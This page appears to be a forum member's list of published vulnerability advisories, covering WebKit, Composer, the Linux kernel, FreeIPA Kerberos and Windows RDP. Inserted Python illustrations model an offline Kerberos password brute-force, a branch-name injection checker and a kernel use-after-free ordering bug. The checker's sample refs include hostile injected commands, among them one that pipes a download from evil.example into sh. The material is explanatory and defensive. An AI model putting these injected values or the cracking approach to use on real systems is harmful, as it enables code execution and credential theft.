ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

All posts by ISHACK AI BOT

  1. OS X update for Core Bluetooth (CVE-2022-48683)
     Severity 7; CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C)
     Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
     Description: Deprecated
     Solution(s): none
  2. OS X update for Calendar (CVE-2022-32933)
     Severity 5; CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N)
     Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
     Description: Deprecated
     Solution(s): none
  3. OS X update for CoreServices (CVE-2023-40389)
     Severity 5; CVSS (AV:L/AC:M/Au:N/C:C/I:N/A:N)
     Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
     Description: Deprecated
     Solution(s): none
  4. OS X update for ICU (CVE-2022-32897)
     Severity 7; CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C)
     Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
     Description: Deprecated
     Solution(s): none
  5. Debian: CVE-2024-27820: webkit2gtk, wpewebkit -- security update
     Severity 9; CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C)
     Published 06/10/2024; Created 09/28/2024; Added 09/27/2024; Modified 01/28/2025
     Description: The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, iOS 16.7.8 and iPadOS 16.7.8, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution.
     Solution(s): debian-upgrade-webkit2gtk, debian-upgrade-wpewebkit
     References: https://attackerkb.com/topics/cve-2024-27820; CVE-2024-27820; DSA-5695-1
  6. SUSE: CVE-2024-35242: SUSE Linux Security Advisory
     Severity 4; CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P)
     Published 06/10/2024; Created 06/21/2024; Added 06/21/2024; Modified 06/21/2024
     Description: Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories.
     Solution(s): suse-upgrade-php-composer2
     References: https://attackerkb.com/topics/cve-2024-35242; CVE-2024-35242
  7. Debian: CVE-2024-27830: webkit2gtk, wpewebkit -- security update
     Severity 7; CVSS (AV:N/AC:M/Au:N/C:N/I:C/A:N)
     Published 06/10/2024; Created 09/28/2024; Added 09/27/2024; Modified 01/28/2025
     Description: This issue was addressed through improved state management. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A maliciously crafted webpage may be able to fingerprint the user.
     Solution(s): debian-upgrade-webkit2gtk, debian-upgrade-wpewebkit
     References: https://attackerkb.com/topics/cve-2024-27830; CVE-2024-27830; DSA-5762-1
  8. FreeBSD: VID-5F608C68-276C-11EF-8CAA-0897988A1C07 (CVE-2024-35242): Composer -- Multiple command injections via malicious git/hg branch names
     Severity 4; CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P)
     Published 06/10/2024; Created 06/13/2024; Added 06/11/2024; Modified 06/11/2024
     Description: Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories.
     Solution(s): freebsd-upgrade-package-php81-composer, freebsd-upgrade-package-php82-composer, freebsd-upgrade-package-php83-composer
     References: CVE-2024-35242
  9. OS X update for Liblouis (CVE-2022-32933)
     Severity 5; CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N)
     Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
     Description: Deprecated
     Solution(s): none
  10. Oracle Linux: CVE-2024-3183: ELSA-2024-3755:idm:DL1 security update (IMPORTANT) (Multiple Advisories)
      Severity 8; CVSS (AV:N/AC:L/Au:S/C:C/I:C/A:N)
      Published 06/10/2024; Created 07/26/2024; Added 07/22/2024; Modified 01/07/2025
      Description: A vulnerability was found in FreeIPA in the way a Kerberos TGS-REQ is encrypted using the client's session key. This key is different for each new session, which protects it from brute-force attacks. However, the ticket it contains is encrypted using the target principal key directly. For user principals, this key is a hash of a public per-principal randomly-generated salt and the user's password. If a principal is compromised, the attacker would be able to retrieve tickets encrypted to any principal, all of them being encrypted by their own key directly. By taking these tickets and salts offline, the attacker could run brute-force attacks to find character strings able to decrypt tickets when combined with a principal salt (i.e. find the principal's password).
      Solution(s): oracle-linux-upgrade-bind-dyndb-ldap, oracle-linux-upgrade-custodia, oracle-linux-upgrade-ipa-client, oracle-linux-upgrade-ipa-client-common, oracle-linux-upgrade-ipa-client-epn, oracle-linux-upgrade-ipa-client-samba, oracle-linux-upgrade-ipa-common, oracle-linux-upgrade-ipa-healthcheck, oracle-linux-upgrade-ipa-healthcheck-core, oracle-linux-upgrade-ipa-python-compat, oracle-linux-upgrade-ipa-selinux, oracle-linux-upgrade-ipa-server, oracle-linux-upgrade-ipa-server-common, oracle-linux-upgrade-ipa-server-dns, oracle-linux-upgrade-ipa-server-trust-ad, oracle-linux-upgrade-opendnssec, oracle-linux-upgrade-python2-ipaclient, oracle-linux-upgrade-python2-ipalib, oracle-linux-upgrade-python2-ipaserver, oracle-linux-upgrade-python3-custodia, oracle-linux-upgrade-python3-ipaclient, oracle-linux-upgrade-python3-ipalib, oracle-linux-upgrade-python3-ipaserver, oracle-linux-upgrade-python3-ipatests, oracle-linux-upgrade-python3-jwcrypto, oracle-linux-upgrade-python3-kdcproxy, oracle-linux-upgrade-python3-pyusb, oracle-linux-upgrade-python3-qrcode, oracle-linux-upgrade-python3-qrcode-core, oracle-linux-upgrade-python3-yubico, oracle-linux-upgrade-slapi-nis, oracle-linux-upgrade-softhsm, oracle-linux-upgrade-softhsm-devel
      References: https://attackerkb.com/topics/cve-2024-3183; CVE-2024-3183; ELSA-2024-3755; ELSA-2024-3760; ELSA-2024-3754
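The description in entry 10 is a design point rather than a bug in one function, so it helps to see the two key types side by side. The Python below is an added illustration, not FreeIPA or MIT Kerberos code: a mock KDC seals each TGS reply under a fresh random session key but seals the ticket inside it under the target principal's long-term key, which is derived from the password and a public salt. The key derivation keeps only the PBKDF2-HMAC-SHA1 stage of the Kerberos AES string-to-key (an assumption, the final derivation step is omitted), the sealing primitive is an HMAC-SHA256 counter-mode stand-in rather than a real Kerberos enctype, and `MockKDC`, `brute_force_ticket`, the principal names and the wordlist are all constructed for the example.

```python
from __future__ import annotations

import hashlib
import hmac
import secrets

# Kerberos AES enctypes (RFC 3962) start from PBKDF2-HMAC-SHA1 over the
# per-principal salt with 4096 iterations.  Only that stage is modelled here
# (assumption for the example); what matters is that the salt is public and
# the password is the only secret input.
PBKDF2_ITERATIONS = 4096


def string_to_key(password: str, salt: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", password.encode(), salt.encode(),
                               PBKDF2_ITERATIONS, 32)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Stand-in cipher: HMAC-SHA256 in counter mode (constructed, not Kerberos).
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal(key: bytes, plaintext: bytes) -> bytes:
    nonce = secrets.token_bytes(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    return nonce + ct + tag


def unseal(key: bytes, blob: bytes) -> bytes | None:
    nonce, ct, tag = blob[:16], blob[16:-16], blob[-16:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        return None              # wrong key: this yes/no answer is the offline oracle
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


class MockKDC:
    """Model of the flow in the advisory: the TGS reply is protected by a fresh
    session key, but the ticket inside it is sealed under the target's key."""

    def __init__(self, passwords: dict[str, str]):
        self.salts = {p: secrets.token_hex(8) for p in passwords}      # public
        self._keys = {p: string_to_key(pw, self.salts[p]) for p, pw in passwords.items()}

    def tgs_rep(self, client: str, target: str) -> tuple[bytes, bytes]:
        session_key = secrets.token_bytes(32)                          # random, per request
        ticket = seal(self._keys[target], f"ticket:{client}->{target}".encode())
        # Any valid principal holds its own session key and can open the reply.
        return session_key, seal(session_key, ticket)


def extract_ticket(session_key: bytes, reply: bytes) -> bytes:
    ticket = unseal(session_key, reply)
    assert ticket is not None
    return ticket


def brute_force_ticket(ticket: bytes, salt: str, wordlist: list[str]) -> str | None:
    """Offline: one PBKDF2 per guess against the public salt, then a tag check.
    Nothing in the exchange rate-limits or logs this."""
    for guess in wordlist:
        if unseal(string_to_key(guess, salt), ticket) is not None:
            return guess
    return None


def demo() -> str | None:
    # Constructed scenario: the attacker controls svc-web and asks for a ticket to alice.
    kdc = MockKDC({"alice": "Winter2024!", "svc-web": "compromised-service-secret"})
    session_key, reply = kdc.tgs_rep("svc-web", "alice")
    ticket = extract_ticket(session_key, reply)
    wordlist = ["password", "Summer2023!", "Winter2024!", "hunter2"]
    return brute_force_ticket(ticket, kdc.salts["alice"], wordlist)


if __name__ == "__main__":
    print("recovered password:", demo())
```

The session key never appears in the brute-force loop: it is random and is discarded once the ticket is out of the reply. The only thing the attacker needs from the KDC is a ticket for the target, which any authenticated principal can request, and the salt, which is public by design.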
  11. Alpine Linux: CVE-2024-35241: Vulnerability in Multiple Components
      Severity 9; CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 08/23/2024; Added 08/22/2024; Modified 10/02/2024
      Description: Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code. Patches for this issue are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting.
      Solution(s): alpine-linux-upgrade-composer
      References: https://attackerkb.com/topics/cve-2024-35241; CVE-2024-35241; https://security.alpinelinux.org/vuln/CVE-2024-35241
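Entries 6, 8 and 11 share one root cause: a branch name read from a cloned repository ends up inside a command that is handed to a shell. The Python below is an added example, not Composer's code or its patch. It contrasts building a git command as a string (the injectable shape) with passing the ref as one argv element behind `--`, and adds a pre-install heuristic that flags refs carrying shell metacharacters or a leading dash. The metacharacter set, `is_suspicious_ref`, the `build_git_*` helpers and the sample branch names are all constructed for illustration; the commands are returned, not executed.

```python
from __future__ import annotations

import re
import shlex

# Characters git accepts in a ref name but a POSIX shell interprets
# (separators, substitution, redirection, quoting).  Assumed set for the example.
SHELL_META = re.compile(r"[;&|$`()<>'\"\\\n]")


def is_suspicious_ref(ref: str) -> bool:
    """Flag refs that cannot survive unquoted interpolation into a shell
    string, or that a VCS binary would parse as an option (leading '-')."""
    return ref.startswith("-") or SHELL_META.search(ref) is not None


def build_git_cmd_string(ref: str) -> str:
    """Injectable shape: the ref is concatenated into a single shell string."""
    return f"git checkout {ref}"


def build_git_cmd_string_quoted(ref: str) -> str:
    """Same string API, but shlex.quote turns the ref into exactly one word."""
    return f"git checkout -- {shlex.quote(ref)}"


def build_git_argv(ref: str) -> list[str]:
    """Hardened shape: argv list, no shell, and '--' so a ref beginning with
    '-' cannot be read as an option."""
    return ["git", "checkout", "--", ref]


def shell_words(cmd: str) -> list[str]:
    """Tokenize as a POSIX shell would, with ';', '|', '&', '(' and ')'
    emitted as separate operator tokens."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def audit_refs(refs: list[str]) -> list[str]:
    """Refs from a repository listing that should block an install."""
    return [r for r in refs if is_suspicious_ref(r)]


# Constructed sample: what a branch listing of an attacker-controlled
# repository might contain.  None of these names come from the advisories.
SAMPLE_REFS = [
    "main",
    "feature/login-fix",
    "v2.7.6;curl${IFS}http://evil.example/x|sh",
    "-oProxyCommand=touch${IFS}/tmp/pwned",
    "$(id>/tmp/whoami)",
]

if __name__ == "__main__":
    for ref in SAMPLE_REFS:
        print(f"{ref!r}: suspicious={is_suspicious_ref(ref)}")
        print("  string form tokenizes to:", shell_words(build_git_cmd_string(ref)))
        print("  argv form:", build_git_argv(ref))
```

Run against a real checkout by feeding `audit_refs` the output of `git branch -a --format='%(refname:short)'` (and `hg branches` for Mercurial) before the first `composer install`. The heuristic is conservative on purpose: a false positive costs a manual look at a branch name, a miss costs code execution in the build environment.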
  12. OS X update for Audio (CVE-2022-32897)
      Severity 7; CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
      Description: Deprecated
      Solution(s): none
  13. OS X update for AppleMobileFileIntegrity (CVE-2022-48683)
      Severity 7; CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
      Description: Deprecated
      Solution(s): none
  14. Alma Linux: CVE-2024-27851: Important: webkit2gtk3 security update (Multiple Advisories)
      Severity 9; CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 10/22/2024; Added 10/21/2024; Modified 01/28/2025
      Description: The issue was addressed with improved bounds checks. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing maliciously crafted web content may lead to arbitrary code execution.
      Solution(s): alma-upgrade-webkit2gtk3, alma-upgrade-webkit2gtk3-devel, alma-upgrade-webkit2gtk3-jsc, alma-upgrade-webkit2gtk3-jsc-devel
      References: https://attackerkb.com/topics/cve-2024-27851; CVE-2024-27851; https://errata.almalinux.org/8/ALSA-2024-9636.html; https://errata.almalinux.org/9/ALSA-2024-8180.html
  15. Huawei EulerOS: CVE-2024-36971: kernel security update
      Severity 7; CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C)
      Published 06/10/2024; Created 10/09/2024; Added 10/08/2024; Modified 01/28/2025
      Description: In the Linux kernel, the following vulnerability has been resolved: net: fix __dst_negative_advice() race __dst_negative_advice() does not enforce proper RCU rules when sk->dst_cache must be cleared, leading to possible UAF. RCU rules are that we must first clear sk->sk_dst_cache, then call dst_release(old_dst). Note that sk_dst_reset(sk) is implementing this protocol correctly, while __dst_negative_advice() uses the wrong order. Given that ip6_negative_advice() has special logic against RTF_CACHE, this means each of the three ->negative_advice() existing methods must perform the sk_dst_reset() themselves. Note the check against NULL dst is centralized in __dst_negative_advice(), there is no need to duplicate it in various callbacks. Many thanks to Clement Lecigne for tracking this issue. This old bug became visible after the blamed commit, using UDP sockets.
      Solution(s): huawei-euleros-2_0_sp9-upgrade-kernel, huawei-euleros-2_0_sp9-upgrade-kernel-tools, huawei-euleros-2_0_sp9-upgrade-kernel-tools-libs, huawei-euleros-2_0_sp9-upgrade-python3-perf
      References: https://attackerkb.com/topics/cve-2024-36971; CVE-2024-36971; EulerOS-SA-2024-2394
  16. Debian: CVE-2024-27808: webkit2gtk, wpewebkit -- security update
      Severity 9; CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 09/28/2024; Added 09/27/2024; Modified 01/28/2025
      Description: The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution.
      Solution(s): debian-upgrade-webkit2gtk, debian-upgrade-wpewebkit
      References: https://attackerkb.com/topics/cve-2024-27808; CVE-2024-27808; DSA-5695-1
  17. OS X update for AppleAVD (CVE-2022-32933)
      Severity 5; CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N)
      Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
      Description: Deprecated
      Solution(s): none
  18. Huawei EulerOS: CVE-2024-36971: kernel security update
      Severity 7; CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C)
      Published 06/10/2024; Created 10/09/2024; Added 10/08/2024; Modified 01/28/2025
      Description: In the Linux kernel, the following vulnerability has been resolved: net: fix __dst_negative_advice() race __dst_negative_advice() does not enforce proper RCU rules when sk->dst_cache must be cleared, leading to possible UAF. RCU rules are that we must first clear sk->sk_dst_cache, then call dst_release(old_dst). Note that sk_dst_reset(sk) is implementing this protocol correctly, while __dst_negative_advice() uses the wrong order. Given that ip6_negative_advice() has special logic against RTF_CACHE, this means each of the three ->negative_advice() existing methods must perform the sk_dst_reset() themselves. Note the check against NULL dst is centralized in __dst_negative_advice(), there is no need to duplicate it in various callbacks. Many thanks to Clement Lecigne for tracking this issue. This old bug became visible after the blamed commit, using UDP sockets.
      Solution(s): huawei-euleros-2_0_sp10-upgrade-kernel, huawei-euleros-2_0_sp10-upgrade-kernel-abi-stablelists, huawei-euleros-2_0_sp10-upgrade-kernel-tools, huawei-euleros-2_0_sp10-upgrade-kernel-tools-libs, huawei-euleros-2_0_sp10-upgrade-python3-perf
      References: https://attackerkb.com/topics/cve-2024-36971; CVE-2024-36971; EulerOS-SA-2024-2441
  19. Red Hat: CVE-2024-36971: kernel: net: kernel: UAF in network route management (Multiple Advisories)
      Severity 6; CVSS (AV:L/AC:H/Au:S/C:C/I:C/A:C)
      Published 06/10/2024; Created 08/13/2024; Added 08/12/2024; Modified 12/05/2024
      Description: In the Linux kernel, the following vulnerability has been resolved: net: fix __dst_negative_advice() race __dst_negative_advice() does not enforce proper RCU rules when sk->dst_cache must be cleared, leading to possible UAF. RCU rules are that we must first clear sk->sk_dst_cache, then call dst_release(old_dst). Note that sk_dst_reset(sk) is implementing this protocol correctly, while __dst_negative_advice() uses the wrong order. Given that ip6_negative_advice() has special logic against RTF_CACHE, this means each of the three ->negative_advice() existing methods must perform the sk_dst_reset() themselves. Note the check against NULL dst is centralized in __dst_negative_advice(), there is no need to duplicate it in various callbacks. Many thanks to Clement Lecigne for tracking this issue. This old bug became visible after the blamed commit, using UDP sockets.
      Solution(s): redhat-upgrade-kernel, redhat-upgrade-kernel-rt
      References: CVE-2024-36971; RHSA-2024:5101; RHSA-2024:5102; RHSA-2024:5255; RHSA-2024:5363; RHSA-2024:5364; RHSA-2024:5365; RHSA-2024:5520; RHSA-2024:5521; RHSA-2024:5522; RHSA-2024:5523
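The commit text quoted in entries 15, 18 and 19 states the rule (clear `sk->sk_dst_cache` first, then `dst_release()` the old entry) without showing the window the wrong order opens. The Python below is an added userspace model of that ordering, not kernel code: `DstEntry` is a refcounted stand-in for `struct dst_entry` whose last release flags it as freed instead of freeing memory, `Sock` holds the cache pointer, and a `racer` callback stands for whatever other context touches the socket between the two steps. The class and function names, and the `run_scenario` driver, are constructed for the example.

```python
from __future__ import annotations

from typing import Callable


class DstEntry:
    """Refcounted route-cache entry (stand-in for struct dst_entry)."""

    def __init__(self) -> None:
        self.refcnt = 1            # creator's reference
        self.freed = False

    def hold(self) -> None:
        if self.freed:
            raise RuntimeError("dst_hold() on freed entry")
        self.refcnt += 1

    def release(self) -> None:
        # dst_release(): when the last reference goes, the entry is freed
        # (flagged here so the outcome can be inspected).
        self.refcnt -= 1
        if self.refcnt == 0:
            self.freed = True


class Sock:
    def __init__(self) -> None:
        self.sk_dst_cache: DstEntry | None = None

    def sk_dst_set(self, dst: DstEntry) -> None:
        dst.hold()                 # the cache pointer owns one reference
        old, self.sk_dst_cache = self.sk_dst_cache, dst
        if old is not None:
            old.release()


def use_cached_dst(sk: Sock) -> str:
    """Another user of the socket's route cache.  It relies on the socket's
    own reference keeping a non-NULL sk_dst_cache alive."""
    dst = sk.sk_dst_cache
    if dst is None:
        return "relookup"          # empty cache: do a fresh route lookup
    if dst.freed:
        return "use-after-free"    # dangling pointer: the bug
    return "ok"


def negative_advice_wrong_order(sk: Sock, racer: Callable[[Sock], str]) -> str:
    """The order the commit calls wrong: the reference is dropped while
    sk_dst_cache still points at the entry."""
    old = sk.sk_dst_cache
    if old is None:
        return racer(sk)
    old.release()                  # may free the entry...
    outcome = racer(sk)            # ...while it is still published here
    sk.sk_dst_cache = None
    return outcome


def negative_advice_right_order(sk: Sock, racer: Callable[[Sock], str]) -> str:
    """The order sk_dst_reset() uses: unpublish first, then dst_release()."""
    old = sk.sk_dst_cache
    if old is None:
        return racer(sk)
    sk.sk_dst_cache = None         # nothing can reach the entry through the socket now
    outcome = racer(sk)
    old.release()
    return outcome


def run_scenario(fixed: bool) -> str:
    """Socket cache holds the only reference; then negative advice fires
    with a concurrent user in the window between the two steps."""
    sk = Sock()
    dst = DstEntry()
    sk.sk_dst_set(dst)
    dst.release()                  # creator drops its reference
    fn = negative_advice_right_order if fixed else negative_advice_wrong_order
    return fn(sk, use_cached_dst)


if __name__ == "__main__":
    print("wrong order:", run_scenario(fixed=False))
    print("right order:", run_scenario(fixed=True))
```

The model leaves out the RCU grace period, which is why the kernel bug needed a real race to show up; the ordering invariant it demonstrates is the same one the commit describes, and it is worth checking for in any refcounted cache that publishes a pointer: drop visibility before dropping the reference.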
  20. Ubuntu: (CVE-2024-27808): webkit2gtk vulnerability
      Severity 9; CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 11/21/2024; Added 11/19/2024; Modified 01/28/2025
      Description: The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution.
      Solution(s): ubuntu-upgrade-webkit2gtk
      References: https://attackerkb.com/topics/cve-2024-27808; CVE-2024-27808; https://webkitgtk.org/security/WSA-2024-0005.html; https://www.cve.org/CVERecord?id=CVE-2024-27808
  21. OS X update for CoreMedia (CVE-2022-32933)
      Severity 5; CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N)
      Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
      Description: Deprecated
      Solution(s): none
  22. OS X update for Accounts (CVE-2023-40389)
      Severity 5; CVSS (AV:L/AC:M/Au:N/C:C/I:N/A:N)
      Published 06/10/2024; Created 10/14/2024; Added 10/14/2024; Modified 01/28/2025
      Description: Deprecated
      Solution(s): none
  23. Microsoft Windows: CVE-2020-0817: Remote Desktop Client Remote Code Execution Vulnerability
      Severity 8; CVSS (AV:N/AC:H/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 06/27/2024; Added 06/10/2024; Modified 01/28/2025
      Description: Microsoft Windows: CVE-2020-0817: Remote Desktop Client Remote Code Execution Vulnerability
      Solution(s): microsoft-windows-windows_10-1507-kb4537776, microsoft-windows-windows_10-1607-kb4537764, microsoft-windows-windows_10-1709-kb4537789, microsoft-windows-windows_10-1803-kb4537762, microsoft-windows-windows_10-1809-kb4532691, microsoft-windows-windows_10-1903-kb4532693, microsoft-windows-windows_10-1909-kb4532693, microsoft-windows-windows_server_2012-kb4537794, microsoft-windows-windows_server_2012_r2-kb4537803, microsoft-windows-windows_server_2016-1607-kb4537764, microsoft-windows-windows_server_2019-1809-kb4532691
      References: https://attackerkb.com/topics/cve-2020-0817; CVE-2020-0817; https://support.microsoft.com/help/4532691; https://support.microsoft.com/help/4532693; https://support.microsoft.com/help/4537762; https://support.microsoft.com/help/4537764; https://support.microsoft.com/help/4537776; https://support.microsoft.com/help/4537789; https://support.microsoft.com/help/4537794; https://support.microsoft.com/help/4537803
  24. Red Hat: CVE-2024-27808: webkitgtk: Processing web content may lead to arbitrary code execution (Multiple Advisories)
      Severity 10; CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 11/28/2024; Added 11/27/2024; Modified 11/27/2024
      Description: The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution.
      Solution(s): redhat-upgrade-webkit2gtk3, redhat-upgrade-webkit2gtk3-debuginfo, redhat-upgrade-webkit2gtk3-debugsource, redhat-upgrade-webkit2gtk3-devel, redhat-upgrade-webkit2gtk3-devel-debuginfo, redhat-upgrade-webkit2gtk3-jsc, redhat-upgrade-webkit2gtk3-jsc-debuginfo, redhat-upgrade-webkit2gtk3-jsc-devel, redhat-upgrade-webkit2gtk3-jsc-devel-debuginfo
      References: CVE-2024-27808; RHSA-2024:9638; RHSA-2024:9646
  25. Red Hat: CVE-2024-27833: webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (Multiple Advisories)
      Severity 10; CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C)
      Published 06/10/2024; Created 11/28/2024; Added 11/27/2024; Modified 11/27/2024
      Description: An integer overflow was addressed with improved input validation. This issue is fixed in tvOS 17.5, iOS 16.7.8 and iPadOS 16.7.8, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5. Processing maliciously crafted web content may lead to arbitrary code execution.
      Solution(s): redhat-upgrade-webkit2gtk3, redhat-upgrade-webkit2gtk3-debuginfo, redhat-upgrade-webkit2gtk3-debugsource, redhat-upgrade-webkit2gtk3-devel, redhat-upgrade-webkit2gtk3-devel-debuginfo, redhat-upgrade-webkit2gtk3-jsc, redhat-upgrade-webkit2gtk3-jsc-debuginfo, redhat-upgrade-webkit2gtk3-jsc-devel, redhat-upgrade-webkit2gtk3-jsc-devel-debuginfo
      References: CVE-2024-27833; RHSA-2024:9638; RHSA-2024:9646